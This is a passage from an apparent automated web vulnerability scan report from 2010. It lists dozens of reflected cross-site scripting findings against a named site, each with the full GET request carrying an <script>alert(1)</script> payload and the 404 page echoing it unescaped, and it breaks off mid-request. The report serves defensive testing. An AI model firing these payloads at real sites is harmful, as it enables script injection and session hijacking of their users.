The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload cf12e<script>alert(1)</script>e01fafe0b25 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/ratingcf12e<script>alert(1)</script>e01fafe0b25/ HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/ratingcf12e<script>alert(1)</script>e01fafe0b25/ was not found on this server.</p>
...[SNIP]...

2.3301. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload d01a4<script>alert(1)</script>1d329551e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/?d01a4<script>alert(1)</script>1d329551e97=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/?d01a4<script>alert(1)</script>1d329551e97=1 was not found on this server.</p>
...[SNIP]...

2.3302. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 75fb2<script>alert(1)</script>95b49d15fba was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail75fb2<script>alert(1)</script>95b49d15fba/46/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail75fb2<script>alert(1)</script>95b49d15fba/46/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3303. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 144d6<script>alert(1)</script>e5d3708daed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46144d6<script>alert(1)</script>e5d3708daed/themes/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:00 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46144d6<script>alert(1)</script>e5d3708daed/themes/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3304. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload eab7c<script>alert(1)</script>2b2bf63e38 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themeseab7c<script>alert(1)</script>2b2bf63e38/kosmos/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:16 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themeseab7c<script>alert(1)</script>2b2bf63e38/kosmos/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3305. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload f0de7<script>alert(1)</script>c73bc9466e6 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmosf0de7<script>alert(1)</script>c73bc9466e6/images/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmosf0de7<script>alert(1)</script>c73bc9466e6/images/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3306. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload e1231<script>alert(1)</script>84f507d43cc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/imagese1231<script>alert(1)</script>84f507d43cc/rating/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:32:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/imagese1231<script>alert(1)</script>84f507d43cc/rating/0.gif was not found on this server.</p>
...[SNIP]...

2.3307. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 6976e<script>alert(1)</script>ad537c9b0b7 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating6976e<script>alert(1)</script>ad537c9b0b7/0.gif HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating6976e<script>alert(1)</script>ad537c9b0b7/0.gif was not found on this server.</p>
...[SNIP]...

2.3308. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload e167e<script>alert(1)</script>628a481f0c2 was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/0.gife167e<script>alert(1)</script>628a481f0c2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:33:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/0.gife167e<script>alert(1)</script>628a481f0c2 was not found on this server.</p>
...[SNIP]...

2.3309. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/0.gif [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/0.gif

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload adb19<script>alert(1)</script>d9b940c2bfe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/0.gif?adb19<script>alert(1)</script>d9b940c2bfe=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Thu, 18 Nov 2010 00:31:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/0.gif?adb19<script>alert(1)</script>d9b940c2bfe=1 was not found on this server.</p>
...[SNIP]...

2.3310. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7e6c3<script>alert(1)</script>113d74b5bf was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7e6c3<script>alert(1)</script>113d74b5bf/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:10:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7e6c3<script>alert(1)</script>113d74b5bf/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3311. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26e83<script>alert(1)</script>b13782fbd41 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/4626e83<script>alert(1)</script>b13782fbd41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:12 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/4626e83<script>alert(1)</script>b13782fbd41/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3312. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 302da<script>alert(1)</script>4409d8f6166 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes302da<script>alert(1)</script>4409d8f6166/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:23 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes302da<script>alert(1)</script>4409d8f6166/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3313. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 90c5f<script>alert(1)</script>bd40caa70bc was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos90c5f<script>alert(1)</script>bd40caa70bc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:33 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos90c5f<script>alert(1)</script>bd40caa70bc/images/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3314. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 9e221<script>alert(1)</script>808b77956ba was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images9e221<script>alert(1)</script>808b77956ba/rating/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:43 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images9e221<script>alert(1)</script>808b77956ba/rating/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3315. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 951e6<script>alert(1)</script>f831f2a46d3 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating951e6<script>alert(1)</script>f831f2a46d3/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:11:53 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating951e6<script>alert(1)</script>f831f2a46d3/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3316. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [REST URL parameter 7] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of REST URL parameter 7 is copied into the HTML document as plain text between tags. The payload bb1f7<script>alert(1)</script>1b5901042ca was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/46/themes/kosmos/images/rating/search.phpbb1f7<script>alert(1)</script>1b5901042ca?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:12:09 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.phpbb1f7<script>alert(1)</script>1b5901042ca?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.3317. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload bed74<a>749c8176eca was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbed74<a>749c8176eca&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:09:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/46/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Searchbed74<a>749c8176eca&opt=2 was not found on this server.</p>
...[SNIP]...

2.3318. http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/46/themes/kosmos/images/rating/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 58ed4<a>ed9e8c47083 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/46/themes/kosmos/images/rating/search.php?keyword=search...58ed4<a>ed9e8c47083&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/46/themes/kosmos/images/rating/
